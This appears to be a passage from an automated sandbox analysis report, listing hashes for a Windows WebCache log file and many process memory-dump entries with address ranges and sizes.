SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD5f09caef54cc7b46490d46c8a7b3a37bd
SHA12bb7611218061f8fd80fe47e8afaecc429980325
SHA2560dfce000f937b9ddc334ea084606eed2484f7aee4d8d75ad47f8ad21ddbf2d68
SHA5123a7debb2f890c3b0df847bf025fce0c880108b5427fb7d2c04287e563cea541344a173eba6352d9ef1c3d99a4c138657e47c8cd202839c37eb4aaa08b590accc
-
memory/316-208-0x000001BC02080000-0x000001BC020AA000-memory.dmpFilesize
168KB
-
memory/316-212-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/316-227-0x000001BC02080000-0x000001BC020AA000-memory.dmpFilesize
168KB
-
memory/512-217-0x000001D222DD0000-0x000001D222DFA000-memory.dmpFilesize
168KB
-
memory/512-219-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/512-228-0x000001D222DD0000-0x000001D222DFA000-memory.dmpFilesize
168KB
-
memory/584-196-0x000001C876900000-0x000001C87692A000-memory.dmpFilesize
168KB
-
memory/584-210-0x00007FFC05CAD000-0x00007FFC05CAE000-memory.dmpFilesize
4KB
-
memory/584-198-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/584-221-0x00007FFC05CAC000-0x00007FFC05CAD000-memory.dmpFilesize
4KB
-
memory/584-275-0x000001C876900000-0x000001C87692A000-memory.dmpFilesize
168KB
-
memory/584-218-0x00007FFC05CAF000-0x00007FFC05CB0000-memory.dmpFilesize
4KB
-
memory/584-199-0x000001C876900000-0x000001C87692A000-memory.dmpFilesize
168KB
-
memory/584-194-0x000001C876520000-0x000001C876543000-memory.dmpFilesize
140KB
-
memory/676-224-0x0000029F2D6F0000-0x0000029F2D71A000-memory.dmpFilesize
168KB
-
memory/676-204-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/676-200-0x0000029F2D6F0000-0x0000029F2D71A000-memory.dmpFilesize
168KB
-
memory/716-230-0x000002B9018C0000-0x000002B9018EA000-memory.dmpFilesize
168KB
-
memory/716-223-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/716-220-0x000002B9018C0000-0x000002B9018EA000-memory.dmpFilesize
168KB
-
memory/844-232-0x000001F635CE0000-0x000001F635D0A000-memory.dmpFilesize
168KB
-
memory/844-239-0x000001F635CE0000-0x000001F635D0A000-memory.dmpFilesize
168KB
-
memory/844-234-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/848-137-0x0000000074140000-0x0000000074179000-memory.dmpFilesize
228KB
-
memory/848-37-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/848-229-0x0000000074970000-0x00000000749A9000-memory.dmpFilesize
228KB
-
memory/848-214-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/848-136-0x0000000074460000-0x0000000074499000-memory.dmpFilesize
228KB
-
memory/848-175-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/912-125-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB
-
memory/912-173-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB
-
memory/912-126-0x00000000009C0000-0x0000000000FF6000-memory.dmpFilesize
6.2MB
-
memory/956-226-0x00000218D6BE0000-0x00000218D6C0A000-memory.dmpFilesize
168KB
-
memory/956-207-0x00000218D6BE0000-0x00000218D6C0A000-memory.dmpFilesize
168KB
-
memory/956-211-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/1088-244-0x000001E762490000-0x000001E7624BA000-memory.dmpFilesize
168KB
-
memory/1088-246-0x000001E762490000-0x000001E7624BA000-memory.dmpFilesize
168KB
-
memory/1088-301-0x000001E762490000-0x000001E7624BA000-memory.dmpFilesize
168KB
-
memory/1088-245-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/1108-250-0x0000015EBF940000-0x0000015EBF96A000-memory.dmpFilesize
168KB
-
memory/1108-302-0x0000015EBF940000-0x0000015EBF96A000-memory.dmpFilesize
168KB
-
memory/1108-252-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/1180-256-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/1180-254-0x000002ABEA230000-0x000002ABEA25A000-memory.dmpFilesize
168KB
-
memory/1216-258-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/1216-257-0x00000216A2510000-0x00000216A253A000-memory.dmpFilesize
168KB
-
memory/1268-266-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/1268-267-0x000002C5BB140000-0x000002C5BB16A000-memory.dmpFilesize
168KB
-
memory/1268-264-0x000002C5BB140000-0x000002C5BB16A000-memory.dmpFilesize
168KB
-
memory/1288-269-0x000001A157730000-0x000001A15775A000-memory.dmpFilesize
168KB
-
memory/1288-271-0x00007FFBC5C90000-0x00007FFBC5CA0000-memory.dmpFilesize
64KB
-
memory/1316-293-0x0000028634890000-0x00000286348BA000-memory.dmpFilesize
168KB
-
memory/1424-281-0x000001BAF65B0000-0x000001BAF65DA000-memory.dmpFilesize
168KB
-
memory/1432-286-0x0000023CD8280000-0x0000023CD82AA000-memory.dmpFilesize
168KB
-
memory/1500-291-0x000001E1A3F70000-0x000001E1A3F9A000-memory.dmpFilesize
168KB
-
memory/1516-311-0x000001C6CF160000-0x000001C6CF18A000-memory.dmpFilesize
168KB
-
memory/1592-176-0x0000000073B70000-0x0000000074320000-memory.dmpFilesize
7.7MB
-
memory/1592-279-0x0000000003920000-0x0000000003942000-memory.dmpFilesize
136KB
-
memory/1592-189-0x00000000010A0000-0x00000000010B0000-memory.dmpFilesize
64KB
-
memory/1592-261-0x0000000073B70000-0x0000000074320000-memory.dmpFilesize
7.7MB
-
memory/1592-299-0x0000000004290000-0x00000000042F6000-memory.dmpFilesize
408KB
-
memory/1592-181-0x0000000000FA0000-0x0000000000FD6000-memory.dmpFilesize
216KB
-
memory/1592-294-0x0000000004170000-0x00000000041D6000-memory.dmpFilesize
408KB
-
memory/1592-265-0x00000000010A0000-0x00000000010B0000-memory.dmpFilesize
64KB
-
memory/1592-197-0x0000000003A90000-0x00000000040B8000-memory.dmpFilesize
6.2MB
-
memory/1592-177-0x00000000010A0000-0x00000000010B0000-memory.dmpFilesize
64KB
-
memory/1636-315-0x0000026F7AF40000-0x0000026F7AF6A000-memory.dmpFilesize
168KB
-
memory/1696-318-0x0000015E5BB60000-0x0000015E5BB8A000-memory.dmpFilesize
168KB
-
memory/1844-188-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1844-192-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1844-190-0x00007FFC04FD0000-0x00007FFC0508E000-memory.dmpFilesize
760KB
-
memory/1844-182-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1844-183-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1844-184-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1844-185-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmpFilesize
2.0MB
-
memory/4072-160-0x000001E902300000-0x000001E902310000-memory.dmpFilesize
64KB
-
memory/4072-159-0x000001E9022D0000-0x000001E9022F2000-memory.dmpFilesize
136KB
-
memory/4072-242-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB
-
memory/4072-235-0x000001E902300000-0x000001E902310000-memory.dmpFilesize
64KB
-
memory/4072-233-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB
-
memory/4072-147-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB
-
memory/4072-240-0x000001E902300000-0x000001E902310000-memory.dmpFilesize
64KB
-
memory/4072-148-0x000001E902300000-0x000001E902310000-memory.dmpFilesize
64KB
-
memory/4072-149-0x000001E902300000-0x000001E902310000-memory.dmpFilesize
64KB
-
memory/4284-174-0x00000225EF390000-0x00000225EF3A0000-memory.dmpFilesize
64KB
-
memory/4284-191-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB
-
memory/4284-162-0x00000225EF390000-0x00000225EF3A0000-memory.dmpFilesize
64KB
-
memory/4284-161-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB
-
memory/4284-178-0x00000225EF350000-0x00000225EF38E000-memory.dmpFilesize
248KB
-
memory/4284-179-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmpFilesize
2.0MB
-
memory/4284-163-0x00000225EF390000-0x00000225EF3A0000-memory.dmpFilesize
64KB
-
memory/4284-180-0x00007FFC04FD0000-0x00007FFC0508E000-memory.dmpFilesize
760KB
-
memory/5052-0-0x00000000005D0000-0x0000000000DBC000-memory.dmpFilesize
7.9MB
-
memory/5052-134-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB
-
memory/5052-4-0x000000001BB40000-0x000000001BB50000-memory.dmpFilesize
64KB
-
memory/5052-3-0x000000001BB40000-0x000000001BB50000-memory.dmpFilesize
64KB
-
memory/5052-2-0x000000001BB40000-0x000000001BB50000-memory.dmpFilesize
64KB
-
memory/5052-1-0x00007FFBE7850000-0x00007FFBE8311000-memory.dmpFilesize
10.8MB